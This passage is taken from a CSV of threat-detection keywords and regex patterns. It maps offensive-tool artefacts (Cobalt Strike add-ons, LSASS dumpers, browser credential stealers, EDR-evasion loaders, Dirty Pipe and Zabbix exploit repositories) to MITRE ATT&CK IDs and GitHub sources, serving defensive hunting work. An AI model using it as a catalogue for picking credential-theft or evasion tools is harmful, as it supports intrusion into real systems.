Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*//:sptth*",".{0,1000}\/\/\:sptth.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed https://","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*//Lh0St/InJ3C*",".{0,1000}\/\/Lh0St\/InJ3C.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*//localhost:1337*",".{0,1000}\/\/localhost\:1337.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - 
Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1268","189","2024-02-22T06:34:08Z","2020-03-09T05:48:58Z" "*//RRh0St/InJ3C*",".{0,1000}\/\/RRh0St\/InJ3C.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*//shuck.sh*",".{0,1000}\/\/shuck\.sh.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is designed to downgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","60","9","2023-10-11T13:50:11Z","2023-01-27T07:52:47Z" "*//StaticSyscallsDump/*",".{0,1000}\/\/StaticSyscallsDump\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/_distutils_hack.zip*",".{0,1000}\/_distutils_hack\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/0d1n.c*",".{0,1000}\/0d1n\.c.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/0d1n_view*",".{0,1000}\/0d1n_view.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/0tt7/CVE-2022-23131*",".{0,1000}\/0tt7\/CVE\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0004","N/A","N/A","Exploitation tools","https://github.com/0tt7/CVE-2022-23131","1","1","N/A","N/A","1","16","9","2022-02-21T08:25:56Z","2022-02-21T00:51:14Z" "*/0xdarkvortex-*",".{0,1000}\/0xdarkvortex\-.{0,1000}","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","186","65","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" "*/0xIronGoat/dirty-pipe*",".{0,1000}\/0xIronGoat\/dirty\-pipe.{0,1000}","offensive_tool_keyword","dirty-pipe","POC exploitation for dirty pipe vulnerability","T1068 - T1055 - T1003 - T1015","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xIronGoat/dirty-pipe","1","1","N/A","N/A","1","9","9","2022-03-08T15:47:53Z","2022-03-08T15:30:45Z" "*/0xthirteen/*",".{0,1000}\/0xthirteen\/.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*/0xthirteen/StayKit*",".{0,1000}\/0xthirteen\/StayKit.{0,1000}","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike 
persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*/1$a$$.exe*",".{0,1000}\/1\$a\$\$\.exe.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*/1/all_in_one.7z.torrent*",".{0,1000}\/1\/all_in_one\.7z\.torrent.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*/1/all_in_one_p.7z*",".{0,1000}\/1\/all_in_one_p\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*/1/all_in_one_w.7z*",".{0,1000}\/1\/all_in_one_w\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*/10m_usernames.txt*",".{0,1000}\/10m_usernames\.txt.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory 
usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*/11_Credentials.py*",".{0,1000}\/11_Credentials\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/13_NoseyParker.py*",".{0,1000}\/13_NoseyParker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/17_Custom_Cracklist.py*",".{0,1000}\/17_Custom_Cracklist\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/1mxml/CVE-2022-23131*",".{0,1000}\/1mxml\/CVE\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1190 - T1550 - T1078","TA0001 - TA0003","N/A","N/A","Exploitation tools","https://github.com/1mxml/CVE-2022-23131","1","1","N/A","N/A","1","2","0","2022-02-19T03:14:47Z","2022-02-18T14:48:53Z" "*/365-Stealer.git*",".{0,1000}\/365\-Stealer\.git.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. 
It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*/3DESEncryptor.go*",".{0,1000}\/3DESEncryptor\.go.{0,1000}","offensive_tool_keyword","Augustus","Augustus is a Golang loader that executes shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","127","26","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" "*/3snake.git*",".{0,1000}\/3snake\.git.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","8","713","108","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*/4luc4rdr5290/CVE-2022-0847*",".{0,1000}\/4luc4rdr5290\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/4luc4rdr5290/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-08T20:41:15Z","2022-03-08T20:18:28Z" "*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*",".{0,1000}\/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*",".{0,1000}\/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/9_DPAPI.py*",".{0,1000}\/9_DPAPI\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/AbandonedCOMKeys/*",".{0,1000}\/AbandonedCOMKeys\/.{0,1000}","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). 
Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/ABPTTS.git*",".{0,1000}\/ABPTTS\.git.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*/acarsd-info.nse*",".{0,1000}\/acarsd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Accomplice.git*",".{0,1000}\/Accomplice\.git.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*/AceLdr.cna*",".{0,1000}\/AceLdr\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","808","151","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" "*/acheron.git*",".{0,1000}\/acheron\.git.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","286","33","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*/acheron.go*",".{0,1000}\/acheron\.go.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","286","33","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*/ACLight.git*",".{0,1000}\/ACLight\.git.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*/ACLight/*",".{0,1000}\/ACLight\/.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Information 
Gathering","https://github.com/cyberark/ACLight","1","1","N/A","N/A","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*/acltoolkit*",".{0,1000}\/acltoolkit.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*/acm_enum_cas_*.json*",".{0,1000}\/acm_enum_cas_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/acm_enum_certs_*.json*",".{0,1000}\/acm_enum_certs_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/acm_enum_certs_chain_*.json*",".{0,1000}\/acm_enum_certs_chain_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/acm_enum_certs_expired_*.json*",".{0,1000}\/acm_enum_certs_expired_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services 
environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/acm_enum_certs_info_*.json*",".{0,1000}\/acm_enum_certs_info_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/ActiveScanPlusPlus*",".{0,1000}\/ActiveScanPlusPlus.{0,1000}","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","N/A","6","574","182","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" "*/AD_Enumeration_Hunt*",".{0,1000}\/AD_Enumeration_Hunt.{0,1000}","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","Discovery","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","AD Enumeration","7","1","92","19","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" "*/AD_Miner.git*",".{0,1000}\/AD_Miner\.git.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security 
weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","1","AD Enumeration","7","9","808","82","2024-04-17T15:57:37Z","2023-09-26T12:36:59Z" "*/ADACLScanner.git*",".{0,1000}\/ADACLScanner\.git.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","1","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*/adalanche/modules/*",".{0,1000}\/adalanche\/modules\/.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*/Adamantium-Thief.git*",".{0,1000}\/Adamantium\-Thief\.git.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*/adaudit.git*",".{0,1000}\/adaudit\.git.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*/ADAudit.ps1*",".{0,1000}\/ADAudit\.ps1.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - 
T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*/ADCollector.exe*",".{0,1000}\/ADCollector\.exe.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","1","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*/ADCollector.exe*",".{0,1000}\/ADCollector\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/ADCollector.git*",".{0,1000}\/ADCollector\.git.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","1","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*/adconnectdump.git*",".{0,1000}\/adconnectdump\.git.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential 
